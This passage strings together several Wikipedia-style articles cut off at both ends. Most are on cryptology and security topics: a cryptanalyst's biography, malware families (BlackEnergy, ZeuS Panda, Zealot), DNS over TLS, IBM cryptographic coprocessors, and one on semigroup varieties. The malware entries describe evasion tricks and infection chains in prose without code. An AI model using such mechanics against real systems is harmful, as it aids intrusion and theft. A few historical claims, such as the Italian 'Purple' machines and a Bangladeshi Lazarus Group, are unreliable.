and that’s where she was given her first job as a cryptanalyst by William Friedman in 1937 or 1938. There was a big expansion in the Signal Intelligence and Friedman was looking to recruit individuals to work there. Friedman offered Wilma $1620 while she was making about $1440. She had to put her name on a sign-in sheet and she was 19 on the list. Wilma was ecstatic about this opportunity, more so, because William Friedman and his wife were the major driving force of her cryptology interest. In March 1941, she was first assigned to work with Dr. Abe Sinkov on breaking the Italian diplomatic codes. The Italians invented their own encryption machines, US codenamed as the Japanese Purple Machines, which were improvements of the German Enigma machine. The Italians used their machines to transmit high-level military secrets mainly to diplomats and military officials in Berlin, Washington, and London to avoid intrusions or interceptions from other nations. The Italian intercepts came from Western Union and the British were instrumental in breaking the Italian code. Wilma and her colleagues worked on the Italian problem while taking cryptology courses. They were responsible for getting the messages, organizing it, recording it, filing it, and deciphering the messages. In July 1942, she was assigned to “Department A” which was responsible for working on code messages from the Japanese Army. William Friedman initially worked on breaking the Japanese codes. In two years working in Department A, she was put in charge of the unit whose duty was to analyze and interpret the addresses which were linked to the messages of the Japanese military. One of the main goals of deciphering the Japanese messages was to figure out the Japanese Order of Battle. Wilma worked alongside Ann Caracristi, first female deputy of the NSA, to break the Japanese codes. Wilma was revered for her deep knowledge, prioritize assignments, successfully onboard new team members, and unwavering dedication to her work. The successful work of her team on the Japanese problem allowed the US to gain an upper hand on the Japanese. The Japanese machine was one of the most sophisticated cipher machines in that era and breaking it gave the US access to top-level Japanese messages during World War II. In an NSA interview with Working on the Japanese problem was one of the highest points of Wilma’s cryptology career. At the end of the war, she was requested to work on to the Chinese team which was led by Dr. Leslie Rutledge, an NSA scholar. The request was made by Mr. Frank Rowlett, who was the chief of the Intelligence Division from 1945 to 1947. Frank Rowlett had put Wilma in a difficult situation by asking her to take charge of the Chinese project and report back to him. Essentially asking her to run the project without any regard for Leslie Rutledge who was the head. This made Wilma become conflicted as it went against her convictions. It bothered Wilma so much that she became physically sick and went to see her doctor. According to her doctor, she was on the verge of a nervous breakdown. She eventually verbalized her concerns to Mr. Rowlett and he found someone else to take charge which was a great relief to Wilma. Wilma indicated that she had no ill feelings towards Dr. Leslie Rutledge and they both worked together on starting the missile problem. After working with the Chinese team, she moved to the VENONA Project trying to break Soviet messages. The information obtained from working on the VENONA project was instrumental in the Soviet’s activities during the Cold War. Wilma Davis worked on the VENONA project until 1949, then got married and moved to Canada with her second husband, John Mason. After the demise of her second husband, John Mason, Wilma received a telegram from William Friedman to return to work in Washington D.C. Wilma was put in charge of the Russian Diplomatic problem. She was then reassigned to the VENONA project in 1952 after the death of John Mason. Wilma left her cryptology work again after marrying her third husband, John Davis. She took up the position of assistant director of production. Wilma remained an avid supporter of John Davis in all his roles which contributed to his accomplishments. Wilma Davis left the cryptologic field a few times during her career, but she could not stay away. She returned to work on Venona and returned a second time during the Vietnam War. Despite leaving and returning twice to cryptology over her career, she finally retired in 1973. Wilma Davis concluded her career as a pioneer cryptanalyst as the senior executive of the Cryptanalytic Career Panel. In the years following her retirement, Wilma Davis lived in Fairfax, Virginia. Family life During her early years as a cryptanalyst, she was known as Wilma Berryman. Wilma was married and widowed three times. She met her first husband, John Berryman, at Bethany College. They were both classmates and moved to Washington D.C in the 1930s. John Berryman worked at the general accounting office in Washington D.C. at the time. John Berryman died six months after Wilma began working for the Signal Intelligence. In the fall of 1949, she married her second husband, John Mason, who was a Major in the British Army. She relocated to Canada with John Mason, who died suddenly in summer of 1952 while visiting her sister, Helen, in Erie, Pennsylvania. Wilma returned to the US to continue her job as a cryptanalyst and married her third husband, John Davis, who was a Brigadier General. Legacy and death Wilma Davis is featured as one of 18 leading women in cryptology by the National Cryptologic Museum Foundation. Wilma Davis is recognized as an Honoree of the Women in American Cryptology by the National Security Agency (NSA). An article written by her in the Phoenician describes her as “one of the Founding Mothers of cryptology”. Benson K. Buffman describes her as one of the most gifted cryptanalysts of Arlington Hall. Wilma Davis died on December 10, 2001, at the age of 89 and currently buried beside her third husband, John Davis, at the Arlington National Cemetery in Fort Myer Arlington, Virginia. References American cryptographers 1912 births 2001 deaths
56977631
https://en.wikipedia.org/wiki/Idka
Idka
Idka AB is a collaborative platform headquartered in Sweden. Idka allows you to connect, share, store and share documents and files, while keeping your data completely safe. Idka is advertising-free, and fully encrypted. The solution combines all of the functionality of social media in one place, and will never share or sell information. The user controls the sharing. Idka, which is available as an HTML5 web service, requires no IT knowledge or support, and no installation of any kind except for apps on iOS and Android. Background Idka was founded upon the belief that the advertising-driven model cannot be fixed, contrary to what Facebook and others have said. Idka is the antithesis to the 'Stalker Economy', the foundation of today's social networking, were the users themselves are the product. The built-in drivers of the advertising model will inevitably lead to serious privacy violations, but more than that, it creates a problem for a free democratic way of life. The problem of tailored news (echo chambers), dark posts, political ‘nudging’ and covert political campaigning, profiling and surveillance is real and has already had discernible impact. Description Idka has been created as a product in its own right, where users pay a small monthly subscription for a service with short, understandable, and fair user terms. The service is free of advertising, news streams, and manipulation. Idka centers on privacy and security, so encryption and 2-factor authentication is central. All default actions are set up to protect the user's privacy. There is no pre-population or prompting to invite or collect friends and contacts. A post will not be shared when published without an intended and specific share action from the user. A private post cannot be changed and shared with new people. People who are added to a many-to-many chat will be able to see chat entries after they are added, etc. A picture in a post cannot be downloaded and it goes away if removed by the person who uploaded it. Delete is really delete, meaning that the information is removed from Idka servers. The service covers a number of functions that are otherwise spread across several platforms, such as posting, chatting with end-to-end encryption (like Telegram and Signal), many-to-many chatting (like hang-out), integrated drag&drop cloud storage (like Box and DropBox) without file size limits, etc. When a group is created, it will immediately have its own cloud storage, its own chat and posting wall. Members can be read-only if necessary. The service also caters to companies with ‘organizational accounts’ and provides more functionality than other web services (such as Slack). References External links Companies based in Stockholm Online companies of Sweden Multilingual websites Proprietary cross-platform software Real-time web Swedish social networking websites Text messaging
57064057
https://en.wikipedia.org/wiki/BlackEnergy
BlackEnergy
BlackEnergy Malware was first reported in 2007 as an HTTP-based toolkit that generated bots to execute distributed denial of service attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS. In 2014, BlackEnergy 3 came equipped with a variety of plug-ins. A Russian-based group known as Sandworm (aka Voodoo Bear) is attributed with using BlackEnergy targeted attacks. The attack is distributed via a Word document or PowerPoint attachment in an email, luring victims into clicking the seemingly legitimate file. BlackEnergy 1 (BE1) BlackEnergy's code facilitates different attack types to infect target machines. It is also equipped with server-side scripts which the perpetrators can develop in the Command and control (C&C) server. Cybercriminals use the BlackEnergy bot builder toolkit to generate customized bot client executable files that are then distributed to targets via email spam and phishing e-mail campaigns. BE1 lacks the exploit functionalities and relies on external tools to load the bot. BlackEnergy can be detected using the YARA signatures provided by the United States Department of Homeland Security (DHS). Key Features • can target more than one IP address per hostname • has a runtime encrypter to evade detection by antivirus software • hides its processes in a system driver (syssrv.sys) Command Types • DDoS attack commands (e.g. ICMP flood, TCP SYN flood, UDP flood, HTTP get flood, DNS flood, etc.) • download commands to retrieve and launch new or updated executables from its server • control commands (e.g. stop, wait, or die) BlackEnergy 2 (BE2) BlackEnergy 2 uses sophisticated rootkit/process-injection techniques, robust encryption, and a modular architecture known as a "dropper". This decrypts and decompresses the rootkit driver binary and installs it on the victim machine as a server with a randomly generated name. As an update on BlackEnergy 1, it combines older rootkit source code with new functions for unpacking and injecting modules into user processes. Packed content is compressed using the LZ77 algorithm and encrypted using a modified version of the RC4 cipher. A hard-coded 128-bit key decrypts embedded content. For decrypting network traffic, the cipher uses the bot's unique identification string as the key. A second variation of the encryption/compression scheme adds an initialization vector to the modified RC4 cipher for additional protection in the dropper and rootkit unpacking stub, but is not used in the inner rootkit nor in the userspace modules. The primary modification in the RC4 implementation in BlackEnergy 2 lies in the key-scheduling algorithm. Capabilities • can execute local files • can download and execute remote files • updates itself and its plugins with command and control servers • can execute die or destroy commands BlackEnergy 3 (BE3) The latest full version of BlackEnergy emerged in 2014. The changes simplified the malware code: this version installer drops the main dynamically linked library (DLL) component directly to the local application data folder. This variant of the malware was involved in the December 2015 Ukraine power grid cyberattack. Plug-ins • fs.dll — File system operations • si.dll — System information, “BlackEnergy Lite” • jn.dll — Parasitic infector • ki.dll — Keystroke Logging • ps.dll — Password stealer • ss.dll — Screenshots • vs.dll — Network discovery, remote execution • tv.dll — Team viewer • rd.dll — Simple pseudo “remote desktop” • up.dll — Update malware • dc.dll — List Windows accounts • bs.dll — Query system hardware, BIOS, and Windows info • dstr.dll — Destroy system • scan.dll — Network scan References Malware toolkits Windows trojans Cyberattacks on energy sector
57069851
https://en.wikipedia.org/wiki/ZeuS%20Panda
ZeuS Panda
ZeuS Panda, Panda Banker, or Panda is a variant of the original Zeus (Trojan horse) under the banking Trojan category. Its discovery was in 2016 in Brazil around the time of the Olympic Games. The majority of the code is derived from the original Zeus trojan, and maintains the coding to carry out man-in-the-browser, keystroke logging, and form grabbing attacks. ZeuS Panda launches attack campaigns with a variety of exploit kits and loaders by way of drive-by downloads and phishing emails, and also hooking internet search results to infected pages. Stealth capabilities make not only detecting but analyzing the malware difficult. Capabilities ZeuS Panda utilizes the capabilities from numerous loaders such as Emotet, Smoke Loader, Godzilla, and Hancitor. The methods of the loaders vary but the same end state goal of installing ZeuS Panda into a system is the same. Many of the loaders were originally trojans before were retooled as a delivery system for ZeuS Panda. The delivery mechanisms do not stop necessarily with the aforementioned loaders as Exploit kits such as Angler, Nuclear, Neutrino, Sundown are also utilized. Coders of the ZeuS Panda banking trojan, as well as other trojan coders, lean toward employing loaders over exploit kits due to the higher potential yield in monetary gain. The loaders also add the persistent capability of ZeuS Panda across reboot and also if it is deleted. If ZeuS Panda no longer detected on a system and if the loader is still present, it will re-download the nefarious code and start running all over again. One of the key distinctions of ZeuS Panda over other banking trojans is the ability to target systems in specific regions of the world. It does this by a rudimentary process by which it detects the Human Interface Device code the attached keyboard. If a keyboard code from Russia (0x419), Belarus (0x423), Kazakhstan (0x43f) or Ukraine (0x422) is detected Zeus Panda will self delete. This falls in line with the ethics of Russian cyber criminals abide to avoid detainment: “Russians must not hack Russians…”, second “If a Russian Intelligence service asks for help, you provide it”, and last “Watch where you vacation”. ZeuS Panda employs many methods of infection, namely drive by downloads, poisoned email, word document macro. The drive by downloads are “Downloads which a person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet) automatically.” Including “Any download that happens without a person's knowledge, often a computer virus, spyware, malware, or crimeware.” Poisoned email occurs when a mailing list is injected with a number of invalid e-mail addresses, the resources required to send a message to this list has increased, even though the number of valid recipients has not. Command and control servers are how ZeuS Panda is able to spread across the vastness of the world but also remain under control by a handful of operators. Area of interest First discovered in 2016 prior to the Olympics in Brazil, ZeuS Panda has spread to all parts of the globe in similar fashion to the original Zeus banking trojan. This is similar to the map of Zeus infections across the global, especially in regional concentrations of infection. Locations of the infected domains by region and concentration are similar to the original Zeus infection locations. Though there are still locations within Russia which are listed as infections, it is likely to be a standalone server distributing the banking trojan. Countries which are targeted more than others are likely based on the GDP. There are regions which do not have as many reported infections. Some of the reasons are likely lack of sufficient GDP to be a target, one of the protected areas which Russian cybercriminals do not attack, or simply lack of reporting by personnel and antivirus in the region. Stealth capabilities ZeuS Panda is able to detect and counter many forensic analytic tools and sandbox environments. Currently there is at least 23 known tools it can detect and if any of them are found on the system, ZeuS Panda stops installation and removes itself from the system. Adding the “-f” command line parameter at the start of the malware will do away with this security feature in effort to raise infection rate at the risk of detection. Aside from the anti-detection capabilities, it also has anti-analysis protocols should the “-f” function be used or a program not on the trojans watchlist detect it. It does so by inspecting the file, mutex, running process, and registry key. After the anti-detection and analysis parameters are met, ZeuS Panda will deeply embed itself into the system registry. It will looks for empty folders with a long subfolder chain without the names Microsoft or Firefox in the tree. Encrypting its data adds to the difficulty of detection by cyber forensics. The configuration settings are encrypted with RC4 and AES encryption, but is also known to use cryptographic hash functions employing SHA256 and SHA1 algorithms. Detection Certain anti-virus companies have been able to overcome ZeuS Panda's stealth capabilities and remove it from the infected system. Some of them go off of a list of Indicators of Compromise (IoC), and can also determine which campaign the version of ZeuS Panda originated. The IoCs are signatures left behind by the malware as well as IP addresses, hashes, or URLs linked to command and control servers. Once the anti-virus determines it is ZeuS Panda infecting the system, it goes through an automatic algorithm to completely remove it and its loader if possible. There are also ways to remove it manually. References Windows trojans
57070427
https://en.wikipedia.org/wiki/Tr%C3%A9sor
Trésor
Trésor may refer to People Marius Trésor (born 1950), French footballer Trésor Kandol (born 1981) Congolese footballer Tresor Kangambu (born 1987), Qatari footballer Trésor Mputu (born 1985), Congolese footballer Tresor (singer) (born 1987), Congolese singer Other Trésor public, the national administration of the Treasury in France Trésor (album), a 2010 album by Kenza Farah Tresor (club), a German nightclub and record label :fr:Trésor (film, 2009), a film with Fanny Ardant :fr:Trésor (parfum), a 1990 perfume by Lancôme Le Trésor, a 1980 novel by Juliette Benzoni TRESOR, an encryption system for Linux computers
57070751
https://en.wikipedia.org/wiki/Zealot%20Campaign%20%28Malware%29
Zealot Campaign (Malware)
The Zealot Campaign is a cryptocurrency mining malware collected from a series of stolen National Security Agency (NSA) exploits, released by the Shadow Brokers group on both Windows and Linux machines to mine cryptocurrency, specifically Monero. Discovered in December 2017, these exploits appeared in the Zealot suite include EternalBlue, EternalSynergy, and Apache Struts Jakarta Multipart Parser attack exploit, or . The other notable exploit within the Zealot vulnerabilities includes vulnerability , known as DotNetNuke (DNN) which exploits a content management system so that the user can install a Monero miner software. An estimated USD $8,500 of Monero having been mined on a single targeted computer. The campaign was discovered and studied extensively by F5 Networks in December 2017. How it works With many of the Zealot exploits being leaked from the NSA, the malware suite is widely described as having “an unusually high obfuscated payload”, meaning that the exploit works on multiple levels to attack the vulnerable server systems, causing large amounts of damage. The term “Zealot” was derived from the StarCraft series, namely a type of warrior. Introduction This multi-layered attack begins with two HTTP requests, used to scan and target vulnerable systems on the network. Similar attacks in the past were only targeted to either Windows or Linux-based systems, yet Zealot stands out by being prepared for both with its version of Apache Struts exploit along with using DNN. Post-exploitation stage After the operating system (OS) has been identified via a JavaScript, the malware then loads an OS-specific exploit chains: Linux/macOS If the targeted system runs on either Linux or macOS, the Struts payload will install a Python agent for the post-exploitation stage. After checking the target system to see if it has already been infected, it then downloads a cryptocurrency mining software, often referred to as a “mule”. From there, it obfuscates an embedded Python code to process. Different from other botnet malware, the Zealot campaigns request the Command & Control (C&C) server-specific User-Agent and Cookie headers, meaning that anyone but the malware will receive a different response. Due to Zealot encrypting via a RC4 cipher, see below, most network inspection and security software were able to see that the malware was on the network, but were not able to scan it. Windows If the targeted OS is Windows, the Struts payload downloads an encoded PowerShell interpreter. Once it is decoded two times, the program then runs another obfuscated script, which in turn leads the device to a URL to download more files. That file, known as PowerShell script “scv.ps1”, is a heavily obfuscated script which allows the attacker to deploy mining software on the targeted device. The deployed software can also use a Dynamic-link Library (DLL) mining malware, which is deployed using the reflective DLL injection technique to attach the malware to the PowerShell processing itself, as to remain undetected. Scanning for a firewall Prior to moving onto the next stage, the program also checks to see if the firewall is active. If yes, it will pipe an embedded base64 embedded Python code to circumvent the firewall. Another possible solution is known as the “Little Snitch”, which will possibly terminate the firewall if active. Infecting internal networks From the post-exploitation stage, the program scans the target system for Python 2.7 or higher, if it is not found on the system, it will then download it. Following that, it then downloads a Python module (probe.py) to propagate the network, the script itself is highly obfuscated with a base encryption of base64 and is then zipped up to 20 times. The downloaded zip file could be named several iterations, all of which are derived from the StarCraft game. The files included are listed below: Zealot.py – main script executing the EternalBlue and EternalSynergy exploits, see below. A0.py – EternalSynergy exploit with built-in shellcode for Windows 7 A1.py – EternalBlue exploit for Windows 7, receives shellcode as an argument A2.py – EternalBlue exploit for Windows 8, receives a shellcode as an argument M.py – SMB protocol wrapper Raven64.exe – scans the internal network via port 445 and invokes the zealot.py files After all these files run successfully, the miner software is then introduced. Mining Known commonly as the “mule” malware, this PowerShell script is named the “minerd_n.ps2” within the compressed files that are downloaded and executed via the EternalSynergy exploit. The software then utilizes the target system’s hardware to process mining for cryptocurrency. This mining software has reportedly stolen close to $8,500 from one victim, yet total amounts of mined Monero are still speculated among researchers. Exploits involved EternalBlue Initially utilized in the WannaCry ransomware attack in 2017, this exploit was specifically utilized as a mining software with the Zealot campaign. EternalSynergy While not much is known about this exploit, it was used in cooperation with EternalBlue, along with other exploits in the Zealot campaign and others. Most notably, EternalSynergy was involved in the Equifax hack, WannaCry ransomware, and cryptocurrency mining campaigns. DNN An ASP.NET based content management system, DNN (formerly DotNetNuke) sends a serialized object via a vulnerable DNNPersonalization cookie during the HTTP request stage. Using an “ObjectDataProvider” and an “ObjectStateFormatter”, the attacker then embeds another object into the victim’s shell system. This invoked shell system will then deliver the same script that was delivered in the Apache Struts exploit. The DNN acts as a secondary backup for the attackers, should the Apache Struts exploit fail. Apache Struts Jakarta multipart parser Used to deliver a PowerShell script to initiate the attack, this exploit is one of the two HTTP requests sent during the initial stage of infection. Among the first discovered of the exploits of the Zealot campaign, the Jakarta Parser exploit allowed hackers to exploit a “Zero-Day” flaw in the software to hack into the financial firm, Equifax in March 2017. This particular exploit was the most notable and public of the exploits, as it was utilized in a largely public case, and was still being utilized until December 2017, when the exploit was patched. Uses The Lazarus Group The Bangladeshi-based group utilized a spear-phishing method, known commonly as Business Email Compromise (BCE), to steal cryptocurrency from unsuspecting employees. Lazarus primarily targeted employees of cryptocurrency financial organizations, which was executed via a Word document, claiming to be a legitimate-appearing European company. When the document was opened, the embedded trojan virus would then load onto the system computer and begin to steal credentials and other malware. While the specific Malware is still unknown, it does have ties to the Zealot malware. Equifax Data Breach (2017) Among the several exploits involved the March 2017 Equifax data breach, the Jakarta Parser, EternalBlue, and EternalSynergy were heavily involved with attacking the servers. Instead of the software being utilized to mine cryptocurrency, it was used to mine the data of over 130 million Equifax customers. References Malware Cryptocurrencies
57070883
https://en.wikipedia.org/wiki/DNS%20over%20TLS
DNS over TLS
DNS over TLS (DoT) is a network security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks. While DNS-over-TLS is applicable to any DNS transaction, it was first standardized for use between stub or forwarding resolvers and recursive resolvers, in in May of 2016. Subsequent IETF efforts specify the use of DoT between recursive and authoritative servers ("Authoritative DNS-over-TLS" or "ADoT") and a related implementation between authoritative servers (Zone Transfer-over-TLS or "xfr-over-TLS"). Server software BIND supports DoT connections as of version 9.17. Earlier versions offered DoT capability by proxying through stunnel. Unbound has supported DNS over TLS since 22 January 2018. Unwind has supported DoT since 29 January 2019. With Android Pie's support for DNS over TLS, some ad blockers now support using the encrypted protocol as a relatively easy way to access their services versus any of the various work-around methods typically used such as VPNs and proxy servers. Simple DNS Plus, a resolving and authoritative DNS server for Windows, added support for DoT in version 9.0 released 28 September 2021. Client software Android clients running Android 9 (Pie) or newer support DNS over TLS and will use it by default if the network infrastructure, for example the ISP, supports it. In April 2018, Google announced that Android Pie will include support for DNS over TLS, allowing users to set a DNS server phone-wide on both Wi-Fi and mobile connections, an option that was historically only possible on rooted devices. DNSDist, from PowerDNS, also announced support for DNS over TLS in version 1.3.0. Linux and Windows users can use DNS over TLS as a client through the NLnet Labs stubby daemon or Knot Resolver. Alternatively they may install getdns-utils to use DoT directly with the getdns_query tool. The unbound DNS resolver by NLnet Labs also supports DNS over TLS. Apple's iOS 14 introduced OS-level support for DNS over TLS (and DNS over HTTPS). iOS does not allow manual configuration of DoT servers, and requires the use of a third-party application to make configuration changes. systemd-resolved is a Linux-only implementation that can be configured to use DNS over TLS, by editing /etc/systemd/resolved.conf and enabling the setting DNSOverTLS. Most major Linux distributions have systemd installed by default. personalDNSfilter is an open source DNS filter with support for DoT and DNS over HTTPS (DoH) for Java-enabled devices including Android. Nebulo is an open source DNS changer application for Android which supports both DoT and DoH. Public resolvers DNS-over-TLS was first implemented in a public recursive resolver by Quad9 in 2017. Other recursive resolver operators such as Google and Cloudflare followed suit in subsequent years, and now it is a broadly-supported feature generally available in most large recursive resolvers. Criticisms and implementation considerations DoT can impede analysis and monitoring of DNS traffic for cybersecurity purposes. DoT has been used to bypass parental controls which operate at the (unencrypted) standard DNS level; Circle, a parental control router which relies on DNS queries to check domains against a blocklist, blocks DoT by default due to this. However, there are DNS providers that offer filtering and parental controls along with support for both DoT and DoH. In that scenario, DNS queries are checked against block lists once they are received by the provider rather than prior to leaving the user's router. Encryption by itself does not protect privacy. It only protects against third-party observers. It does not guarantee what the endpoints do with the (then decrypted) data. DoT clients do not necessarily directly query any authoritative name servers. The client may rely on the DoT server using traditional (port 53 or 853) queries to finally reach authoritative servers. Thus, DoT does not qualify as an end-to-end encrypted protocol, only hop-to-hop encrypted and only if DNS over TLS is used consistently. Alternatives DNS over HTTPS (DoH) is a similar protocol standard for encrypting DNS queries, differing only in the methods used for encryption and delivery from DoT. On the basis of privacy and security, whether or not a superior protocol exists among the two is a matter of controversial debate, while others argue the merits of either depend on the specific use case. DNSCrypt is another network protocol that authenticates and encrypts DNS traffic, although it was never proposed to the Internet Engineering Task Force (IETF) with a Request for Comments (RFC). See also DNSCurve Public recursive name server References External links – Specification for DNS over Transport Layer Security (TLS) – Usage Profiles for DNS over TLS and DNS over DTLS DNS Privacy Project: dnsprivacy.org Domain Name System Internet protocols Application layer protocols Internet security Transport Layer Security
57088805
https://en.wikipedia.org/wiki/IBM%204767
IBM 4767
The IBM 4767 PCIe Cryptographic Coprocessor is a hardware security module (HSM) that includes a secure cryptoprocessor implemented on a high-security, tamper resistant, programmable PCIe board. Specialized cryptographic electronics, microprocessor, memory, and random number generator housed within a tamper-responding environment provide a highly secure subsystem in which data processing and cryptography can be performed. Sensitive key material is never exposed outside the physical secure boundary in a clear format. The IBM 4767 is validated to FIPS PUB 140-2 Level 4, the highest level of certification achievable for commercial cryptographic devices. The IBM 4767 data sheet describes the coprocessor in detail. IBM supplies two cryptographic-system implementations: The PKCS#11 implementation creates a high-security solution for application programs developed for this industry-standard API. The IBM Common Cryptographic Architecture (CCA) implementation provides many functions of special interest in the finance industry, extensive support for distributed key management, and a base on which custom processing and cryptographic functions can be added. Toolkits for custom application development are also available. Applications may include financial PIN transactions, bank-to-clearing-house transactions, EMV transactions for integrated circuit (chip) based credit cards, and general-purpose cryptographic applications using symmetric key algorithms, hashing algorithms, and public key algorithms. The operational keys (symmetric or RSA private) are generated in the coprocessor and are then saved either in a keystore file or in application memory, encrypted under the master key of that coprocessor. Any coprocessor with an identical master key can use those keys. Performance benefits include the incorporation of elliptic curve cryptography (ECC) and format preserving encryption (FPE) in the hardware. Supported systems IBM supports the 4767 on certain IBM Z, IBM POWER Systems, and x86 servers (Linux or Microsoft Windows). IBM Z: Crypto Express5S (CEX5S) - feature code 0890 IBM POWER systems: feature codes EJ32 and EJ33 x86: Machine type-model 4767-002 History As of April 2016, the IBM 4767 superseded the IBM 4765 that was discontinued. The IBM 4767 is supported on all platforms listed above. The successor to the 4767, the IBM 4768, was introduced on IBM Z, where it is called the Crypto Express6S (CEX6S) and is available as feature code 0893. References External links These links point to various relevant cryptographic standards. ISO 13491 - Secure Cryptographic Devices: https://www.iso.org/standard/61137.html ISO 9564 - PIN security: https://www.iso.org/standard/68669.html ANSI X9.24 Part 1: Key Management using Symmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-1-2017 ANSI X9.24 Part 2: Key Management using Asymmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-2-2016 FIPS 140-2: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf Cryptographic hardware Banking technology 4767
57151064
https://en.wikipedia.org/wiki/Variety%20of%20finite%20semigroups
Variety of finite semigroups
In mathematics, and more precisely in semigroup theory, a variety of finite semigroups is a class of semigroups having some nice algebraic properties. Those classes can be defined in two distinct ways, using either algebraic notions or topological notions. Varieties of finite monoids, varieties of finite ordered semigroups and varieties of finite ordered monoids are defined similarly. This notion is very similar to the general notion of variety in universal algebra. Definition Two equivalent definitions are now given. Algebraic definition A variety V of finite (ordered) semigroups is a class of finite (ordered) semigroups that: is closed under division. is closed under taking finite Cartesian products. The first condition is equivalent to stating that V is closed under taking subsemigroups and under taking quotients. The second property implies that the empty product—that is, the trivial semigroup of one element—belongs to each variety. Hence a variety is necessarily non-empty. A variety of finite (ordered) monoids is a variety of finite (ordered) semigroups whose elements are monoids. That is, it is a class of (ordered) monoids satisfying the two conditions stated above. Topological definition In order to give the topological definition of a variety of finite semigroups, some other definitions related to profinite words are needed. Let A be an arbitrary finite alphabet. Let A+ be its free semigroup. Then let be the set of profinite words over A. Given a semigroup morphism , let be the unique continuous extension of to . A profinite identity is a pair u and v of profinite words. A semigroup S is said to satisfy the profinite identity u = v if, for each semigroup morphism , the equality holds. A variety of finite semigroups is the class of finite semigroups satisfying a set of profinite identities P. A variety of finite monoids is defined like a variety of finite semigroups, with the difference that one should consider monoid morphisms instead of semigroup morphisms . A variety of finite ordered semigroups/monoids is also given by a similar definition, with the difference that one should consider morphisms of ordered semigroups/monoids. Examples A few examples of classes of semigroups are given. The first examples uses finite identities—that is, profinite identities whose two words are finite words. The next example uses profinite identities. The last one is an example of a class that is not a variety. More examples are given in the article Special classes of semigroups. Using finite identities The most trivial example is the variety S of all finite semigroups. This variety is defined by the empty set of profinite equalities. It is trivial to see that this class of finite semigroups is closed under subsemigroups, finite products, and quotients. The second most trivial example is the variety 1 containing only the trivial semigroup. This variety is defined by the set of profinite equalities {x = y}. Intuitively, this equality states that all elements of the semigroup are equal. This class is trivially closed under subsemigroups, finite products, and quotients. The variety Com of commutative finite semigroups is defined by the profinite equality xy = yx. Intuitively, this equality states that each pair of elements of the semigroup commutes. The variety of idempotent finite semigroups is defined by the profinite equality xx = x. More generally, given a profinite word u and a letter x, the profinite equality ux = xu states that the set of possible images of u contains only elements of the centralizer. Similarly, ux = x states that the set of possible images of u contains only left identities. Finally ux = u states that the set of possible images of u is composed of left zeros. Using profinite identities Examples using profinite words that are not finite are now given. Given a profinite word, x, let denote . Hence, given a semigroup morphism , is the only idempotent power of . Thus, in profinite equalities, represents an arbitrary idempotent. The class G of finite groups is a variety of finite semigroups. Note that a finite group can be defined as a finite semigroup, with a unique idempotent, which in addition is a left and right identity. Once those two properties are translated in terms of profinite equality, one can see that the variety G is defined by the set of profinite equalities Classes that are not varieties Note that the class of finite monoids is not a variety of finite semigroups. Indeed, this class is not closed under subsemigroups. To see this, take any finite semigroup S that is not a monoid. It is a subsemigroup of the monoid S1 formed by adjoining an identity element. Reiterman's theorem Reiterman's theorem states that the two definitions above are equivalent. A scheme of the proof is now given. Given a variety V of semigroups as in the algebraic definition, one can choose the set P of profinite identities to be the set of profinite identities satisfied by every semigroup of V. Reciprocally, given a profinite identity u = v, one can remark that the class of semigroups satisfying this profinite identity is closed under subsemigroups, quotients, and finite products. Thus this class is a variety of finite semigroups. Furthermore, varieties are closed under arbitrary intersection, thus, given an arbitrary set P of profinite identities ui = vi, the class of semigroups satisfying P is the intersection of the class of semigroups satisfying all of those profinite identities. That is, it is an intersection of varieties of finite semigroups, and this a variety of finite semigroups. Comparison with the notion of variety of universal algebra The definition of a variety of finite semigroups is inspired by the notion of a variety of universal algebras. We recall the definition of a variety in universal algebra. Such a variety is, equivalently: a class of structures, closed under homomorphic images, subalgebras and (direct) products. a class of structures satisfying a set of identities. The main differences between the two notions of variety are now given. In this section "variety of (arbitrary) semigroups" means "the class of semigroups as a variety of universal algebra over the vocabulary of one binary operator". It follows from the definitions of those two kind of varieties that, for any variety V of (arbitrary) semigroups, the class of finite semigroups of V is a variety of finite semigroups. We first give an example of a variety of finite semigroups that is not similar to any subvariety of the variety of (arbitrary) semigroups. We then give the difference between the two definition using identities. Finally, we give the difference between the algebraic definitions. As shown above, the class of finite groups is a variety of finite semigroups. However, the class of groups is not a subvariety of the variety of (arbitrary) semigroups. Indeed, is a monoid that is an infinite group. However, its submonoid is not a group. Since the class of (arbitrary) groups contains a semigroup and does not contain one of its subsemigroups, it is not a variety. The main difference between the finite case and the infinite case, when groups are considered, is that a submonoid of a finite group is a finite group. While infinite groups are not closed under taking submonoids. The class of finite groups is a variety of finite semigroups, while it is not a subvariety of the variety of (arbitrary) semigroups. Thus, Reiterman's theorem shows that this class can be defined using profinite identities. And Birkhoff's HSP theorem shows that this class can not be defined using identities (of finite words). This illustrates why the definition of a variety of finite semigroups uses the notion of profinite words and not the notion of identities. We now consider the algebraic definitions of varieties. Requiring that varieties are closed under arbitrary direct products implies that a variety is either trivial or contains infinite structures. In order to restrict varieties to contain only finite structures, the definition of variety of finite semigroups uses the notion of finite product instead of notion of arbitrary direct product. References Mathematical structures Semigroup theory Algebraic structures
57162791
https://en.wikipedia.org/wiki/IBM%204768
IBM 4768
The IBM 4768 PCIe Cryptographic Coprocessor is a hardware security module (HSM) that includes a secure cryptoprocessor implemented on a high-security, tamper resistant, programmable PCIe board. Specialized cryptographic electronics, microprocessor, memory, and random number generator housed within a tamper-responding environment provide a highly secure subsystem in which data processing and cryptography can be performed. Sensitive key material is never exposed outside the physical secure boundary in a clear format. The IBM 4768 is validated to FIPS PUB 140-2 Level 4, the highest level of certification achievable for commercial cryptographic devices. It has achieved PCI-HSM certification. The IBM 4768 data sheet describes the coprocessor in detail. IBM supplies two cryptographic-system implementations: The PKCS#11 implementation creates a high-security solution for application programs developed for this industry-standard API. The IBM Common Cryptographic Architecture (CCA) implementation provides many functions of special interest in the finance industry, extensive support for distributed key management, and a base on which custom processing and cryptographic functions can be added. Applications may include financial PIN transactions, bank-to-clearing-house transactions, EMV transactions for integrated circuit (chip) based credit cards, and general-purpose cryptographic applications using symmetric key algorithms, hashing algorithms, and public key algorithms. The operational keys (symmetric or RSA private) are generated in the coprocessor and are then saved either in a 